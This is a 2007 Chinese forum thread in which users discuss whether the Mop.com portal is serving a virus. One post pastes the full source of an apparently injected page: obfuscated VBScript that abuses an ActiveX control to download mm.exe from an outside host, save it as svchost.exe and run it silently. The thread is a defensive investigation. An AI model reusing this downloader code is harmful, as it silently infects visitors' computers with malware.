12   1  /  2  页   跳转

猫扑网站有病毒 nimaya

收藏
别问我是谁99
头像
初生襁褓狮
  • 帖子:17
  • 注册: 2007-02-15
  • 来自:
发表于: 2007-02-15 13:54 | 只看楼主 短消息 资料
字号: 1楼

猫扑网站有病毒 nimaya

进入时瑞星提示有病毒

附件附件:

下载次数:206
文件类型:application/octet-stream
文件大小:
上传时间:2007-2-15 13:54:30
描述:



最后编辑2007-02-15 15:53:10
分享到:
gototop
 
奇迹天下
头像
叱咤花甲狮
  • 帖子:2935
  • 注册: 2004-07-01
  • 来自:
发表于: 2007-02-15 13:56 | 短消息 资料
字号: 2楼

可能又是误报...
gototop
 
UFO不幸外人
头像
特邀体验者
  • 帖子:2592
  • 注册: 2006-11-26
  • 来自:火星
发表于: 2007-02-15 13:56 | 短消息 资料
字号: 3楼

下个原代码看看就知道是不是误报了
gototop
 
光之创世神
头像
快乐黄口狮
  • 帖子:243
  • 注册: 2006-12-09
  • 来自:
发表于: 2007-02-15 13:57 | 短消息 资料
字号: 4楼

怎么我上的时候没有提示!
gototop
 
别问我是谁99
头像
初生襁褓狮
  • 帖子:17
  • 注册: 2007-02-15
  • 来自:
发表于: 2007-02-15 14:00 | 只看楼主 短消息 资料
字号: 5楼

我是从www.hao123.com 的链接进去的 链接地址为http://www.mop.com
gototop
 
奇迹天下
头像
叱咤花甲狮
  • 帖子:2935
  • 注册: 2004-07-01
  • 来自:
发表于: 2007-02-15 14:01 | 短消息 资料
字号: 6楼

根据后缀是TMP文件,不能直接执行的,要是病毒至少得有一个可以执行啊
gototop
 
UFO不幸外人
头像
特邀体验者
  • 帖子:2592
  • 注册: 2006-11-26
  • 来自:火星
发表于: 2007-02-15 14:04 | 短消息 资料
字号: 7楼

好像不对,如果猫扑中了病毒,那么其所有网页中应该添加一段代码

如果其没有 那么就是楼住连接的网页有问题  卡卡论坛也被别的网站利用,是一种套装格式。如果你去百度搜索这里一个版主的昵称就会发现
gototop
 
烂笔头1
头像
健康舞勺狮
  • 帖子:229
  • 注册: 2005-12-22
  • 来自:
发表于: 2007-02-15 14:43 | 短消息 资料
字号: 8楼

有报
gototop
 
素就像天上的浮云
头像
快乐黄口狮
  • 帖子:206
  • 注册: 2007-02-13
  • 来自:
发表于: 2007-02-15 15:21 | 短消息 资料
字号: 9楼

我的没有报,但是安装了系统安全盾,打开猫朴首页没有反映(机器假死那种)打开首页同时有个调用"http://ac86.cn/88/1.htm"的句子,用迅雷下载打开这个页面发现要下载几个exe文件,我是外行,大家看看:
<html>
<body>
<script type="text/jscript">
function init () {
document.write("<center><font color=red></font><center>");}
window.onload = init;
</script>
<script language="VBScript">
on error resume next
tc = "http://www.koshadu.com/mm.exe"
fname1="svchost.exe"
fname2="svchost.vbs"
Set df = document.createElement("o"&"b"&"j"&"e"&"c"&"t")
df.setAttribute "c"&"l"&"a"&"s"&"s"&"i"&"d", "c"&"l"&"s"&"id:"&"B"&"D"&"96"&"C5"&"56"&"-65"&"A3"&"-11"&"D0"&"-98"&"3A"&"-00"&"C04"&"FC2"&"9E"&"36"
strd="M"&"i"&"c"&"r"&"o"&"s"&"o"&"f"&"t"&"."&"X"&"M"&"L"&"H"&"T"&"T"&"P"
Set x = df.CreateObject(strd,"")
a1="A"&"d"&"o"
a2="d"&"b."
a3="S"&"tr"
a4="e"&"am"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="G"&"E"&"T"
x.Open str6, tc, False
x.Send
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) 
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
fname2= F.BuildPath(tmp,fname2)
set ts = F.OpenTextFile(fname2, 2, True)
ts.WriteLine "Set Shell = CreateObject(""Sh""&""ell""&"".App""&""lic""&""at""&""ion"")"
sql="Shell.ShellExecute"""+fname1+""","""","""",""o""&""p""&""e""&""n"",0"
ts.writeLine sql
ts.close
if F.FileExists(fname1)=true then
if F.FileExists(fname2)=true then
d3="She"&"ll."&"App"&"li"&"ca"&"tion"
set Q = df.createobject(d3,"")
dc="o"&"p"&"e"&"n"
Q.ShellExecute fname2,"","",dc,0
end if
End if
</script>
</body>
</html> 

<script src='http://s47.cnzz.com/stat.php?id=16924&web_id=16924' language='JavaScript' charset='gb2312'></script>
gototop
 
地区性
头像
横据古稀狮
  • 帖子:10228
  • 注册: 2005-04-10
  • 来自:鸟不拉屎的地方
发表于: 2007-02-15 15:58 | 短消息 资料
字号: 10楼

tc = "http://www.koshadu.com/mm.exe"
fname1="svchost.exe

这已经说明问题了
gototop
 
<<上一主题|下一主题>>
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT